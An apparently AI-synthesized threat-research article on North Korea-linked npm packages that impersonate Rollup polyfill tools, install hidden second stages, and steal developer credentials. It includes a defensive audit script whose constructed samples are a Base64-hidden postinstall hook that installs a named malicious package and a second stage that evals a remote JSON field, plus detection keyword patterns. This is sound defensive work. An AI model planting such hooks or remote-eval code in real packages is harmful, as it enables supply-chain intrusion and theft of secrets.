VYPR
Research · Published Jul 3, 2026 · 1 source

North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

Malicious npm packages disguised as Rollup polyfill tools have been distributed by North Korean threat actors to steal developer secrets and establish remote access.

Threat actors with ties to North Korea have been linked to a fresh set of malicious npm packages that masquerade as Rollup polyfill tooling to facilitate remote access and data theft. According to JFrog, the packages "rollup-packages-polyfill-core" and "rollup-runtime-polyfill-core" mimic the legitimate "rollup-plugin-polyfill-node" project, down to the description, repository metadata, and package shape. The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review.

The campaign also involves four other packages, all of which have since been removed from the npm registry: "quirky-token," "react-icon-svgs," "rollup-plugin-polyfill-connect," and "swift-parse-stream." What's noteworthy here is that "rollup-packages-polyfill-core" installs and loads "swift-parse-stream," while "rollup-runtime-polyfill-core" installs and loads "quirky-token." In a similar fashion, "react-icon-svgs" has been found to install "rollup-plugin-polyfill-connect" as a second stage.

The second-stage packages are near-identical SVG utilities that fetch a JSON object from JSON Keeper and pass its "model" field to eval(). This layered structure, together with the lookalike names, legitimate-looking metadata, hidden install-time execution, environment checks, and credential-theft/remote-access payloads, is similar to previous North Korean Lazarus-linked npm campaigns. This is not the first time North Korean threat actors have uploaded npm packages impersonating Rollup polyfill tools; in April 2026, Panther detailed a sustained npm campaign that involved publishing 108 malicious npm packages spanning 261 versions to deliver BeaverTail and OtterCookie, two known malware families linked to Contagious Interview.

The attack begins with a Base64-encoded npm install command for "swift-parse-stream" (or "quirky-token") concealed within "rollup-packages-polyfill-core" (or "rollup-runtime-polyfill-core"). These second-stage packages, disguised as SVG sanitization utilities, reach out to a JSON Keeper URL to retrieve and execute JavaScript malware. The code performs checks to avoid execution within cloud development environments, sandboxes, serverless runtimes, and analysis infrastructure.
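As an added example, not code from the malicious packages and not JFrog's tooling, the following Node.js script audits a package for the two behaviours described above: a lifecycle script that hides a Base64-encoded "npm install" of a second stage behind eval()/child_process, and second-stage source that fetches JSON and passes one of its fields to eval(). The manifest and snippet it scans are constructed to mimic the described shape (the package name "example-polyfill-core" is hypothetical), and the regex heuristics are this editor's own, not a published detection rule.

```javascript
// Added example: offline audit for the install-chain patterns described above.
// Not code from the malicious packages or from JFrog's analysis. The manifest and
// second-stage snippet below are constructed to mimic the described shape; the
// package name "example-polyfill-core" is hypothetical.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const SUSPICIOUS_TOKENS = [
  'npm install', 'npm i ', 'npx ', 'child_process', 'execSync', 'spawn(',
  'eval(', 'Function(', 'require(', 'fetch(', 'https.get', 'base64',
];
// Second-stage names reported in the article (all since removed from npm).
const KNOWN_SECOND_STAGES = [
  'quirky-token', 'react-icon-svgs', 'rollup-plugin-polyfill-connect', 'swift-parse-stream',
];
const B64_RE = /[A-Za-z0-9+/]{24,}={0,2}/g;

// Decode every Base64-looking run and keep the ones that decode to readable text.
function decodeBase64Candidates(text) {
  const out = [];
  for (const encoded of text.match(B64_RE) || []) {
    const decoded = Buffer.from(encoded, 'base64').toString('utf8');
    const printable = decoded.replace(/[^\x20-\x7e\t\r\n]/g, '').length;
    if (decoded.length > 0 && printable / decoded.length > 0.9) out.push({ encoded, decoded });
  }
  return out;
}

// Pattern 1: a lifecycle script that hides "npm install <second stage>" (or any
// other execution) behind Base64 plus eval()/child_process.
function scanLifecycleScripts(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const decoded = decodeBase64Candidates(cmd);
    // Look at the raw command and at every decoded blob it carries.
    const views = [cmd, ...decoded.map((d) => d.decoded)];
    const indicators = SUSPICIOUS_TOKENS.filter((t) => views.some((v) => v.includes(t)));
    const secondStage = [];
    for (const v of views) {
      for (const m of v.matchAll(/npm\s+(?:install|i)\s+([^\s;&|'"()]+)/g)) secondStage.push(m[1]);
    }
    if (indicators.length || decoded.length) {
      findings.push({ hook, indicators, decoded: decoded.map((d) => d.decoded), secondStage });
    }
  }
  return findings;
}

// Pattern 2: source that fetches JSON and passes one of its fields to eval().
function scanSource(code) {
  const fetchesRemote = /\b(?:fetch|axios\.get|https?\.get|got)\s*\(/.test(code);
  const parsesJson = /\.json\s*\(\s*\)|JSON\.parse\s*\(/.test(code);
  const findings = [];
  for (const m of code.matchAll(/\b(?:eval|Function)\s*\(\s*([A-Za-z_$][\w$]*)\.([A-Za-z_$][\w$]*)\s*\)/g)) {
    findings.push({ sink: m[0], object: m[1], field: m[2], remoteJson: fetchesRemote && parsesJson });
  }
  return findings;
}

// Combine both scans; a known second-stage name is a hard block, anything else
// that executes at install time or evals remote JSON is a review prompt.
function auditPackage({ manifest, sources }) {
  const lifecycle = scanLifecycleScripts(manifest);
  const source = sources.flatMap((s) => scanSource(s.code).map((f) => ({ file: s.file, ...f })));
  const knownSecondStages = lifecycle.flatMap((f) => f.secondStage).filter((n) => KNOWN_SECOND_STAGES.includes(n));
  let severity = 'ok';
  if (lifecycle.length || source.some((f) => f.remoteJson)) severity = 'review';
  if (knownSecondStages.length) severity = 'block';
  return { package: manifest.name, severity, knownSecondStages, lifecycle, source };
}

// Constructed sample manifest: postinstall hides an npm install of a second stage
// (shape only; this is not the real package's script).
const HIDDEN = Buffer.from("require('child_process').execSync('npm install swift-parse-stream')").toString('base64');
const SAMPLE_MANIFEST = {
  name: 'example-polyfill-core', // hypothetical name
  version: '1.0.0',
  scripts: {
    build: 'rollup -c',
    postinstall: `node -e "eval(Buffer.from('${HIDDEN}','base64').toString())"`,
  },
};
// Constructed sample second stage: fetch JSON, eval() its "model" field.
const SAMPLE_SECOND_STAGE = {
  file: 'sanitize.js',
  code: `
async function sanitizeSvg(url) {
  const res = await fetch(url);      // remote JSON document
  const data = await res.json();
  eval(data.model);                  // runs whatever the server put in "model"
}
module.exports = { sanitizeSvg };
`,
};

const report = auditPackage({ manifest: SAMPLE_MANIFEST, sources: [SAMPLE_SECOND_STAGE] });
console.log(JSON.stringify(report, null, 2));
```

To use it on a real tree, feed auditPackage each package.json under node_modules together with the files that package ships. Plenty of benign packages run postinstall, so only a decoded install of a name on the reported list is treated as a block; everything else is a prompt to read the script by hand.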

If those checks pass, the malware installs the dependencies it needs and contacts an external server ("216.126.236[.]244") to fetch an encrypted JavaScript payload. Once decrypted, this payload acts as a loader for additional scripts. These scripts give the attacker remote access to the compromised host, supporting interactive terminal sessions, command execution, screenshot capture, process termination, and Windows-specific mouse and keyboard control via the "@nut-tree-fork/nut-js" package. They are also designed to steal data from web browsers and cryptocurrency wallets, collect files matching specific extensions, and periodically capture clipboard content.

The capabilities overlap with those of OtterCookie, with the use of "@nut-tree-fork/nut-js" for remote mouse and keyboard control also observed in a package named "express-session-js" detailed by SafeDep in April 2026. The file collector component specifically targets editor history for Microsoft Visual Studio Code, Windsurf, and Cursor, along with developer and AI tool configurations such as AWS, Microsoft Azure, Google Gemini, Anthropic Claude, Foundry, SSH, and Z shell (Zsh).

Rollup plugins are commonly loaded from local configuration files, developer workstations, and CI jobs, environments that routinely hold source code, npm tokens, Git credentials, cloud keys, SSH keys, browser data, wallet material, and project secrets. The payload is more than a simple downloader: once the later stages run, the attacker has both collection and control capabilities on exactly the developer workstations and build machines where that material lives.

This disclosure coincides with the discovery of multiple software supply chain attacks by Checkmarx, SafeDep, and AWS security researcher Chi Tran, aimed at poisoning open-source package repositories and stealing valuable data. These include trojanized "pyrogram" forks (Operation Navy Ghost), npm packages mimicking Polymarket tooling, npm packages under the "@marketfront" scope, and a Python package named "security-alerts-sdk."

Synthesized by Vypr AI